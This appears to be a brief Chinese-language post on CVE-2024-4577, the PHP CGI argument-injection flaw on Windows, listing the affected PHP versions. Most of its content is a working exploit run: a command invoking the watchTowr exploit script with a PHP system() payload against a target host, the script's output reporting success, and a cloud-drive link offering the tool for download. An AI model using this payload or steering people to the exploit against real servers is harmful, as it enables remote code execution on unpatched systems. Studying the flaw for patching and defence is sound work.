该漏洞仅影响 PHP 的 CGI 模式。在此模式下,Web 服务器解析 HTTP 请求并将其传递给 PHP 脚本,然后脚本对其进行一些处理。例如,查询字符串被解析并传递给命令行上的 PHP 解释器 - 例如,诸如 as 的请求http://host/cgi.php?foo=bar可能会被执行为php.exe cgi.php foo=bar。
代码语言:javascript复制python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |___ ________ _ ________
/ / __ ___/ ___| | | | / _ / / _ __
/ / __ | | ___| Y | |( <_> / | | /
/_/ (____ |__| ___ |___|__|__ | __ / /_/ |__|
/ / /
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr (aliz@watchTowr.com)
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
( ) Exploit was successful
此漏洞影响 Windows 操作系统上安装的所有版本的 PHP:
代码语言:javascript复制PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
工具下载
https://pan.quark.cn/s/0630aca23d42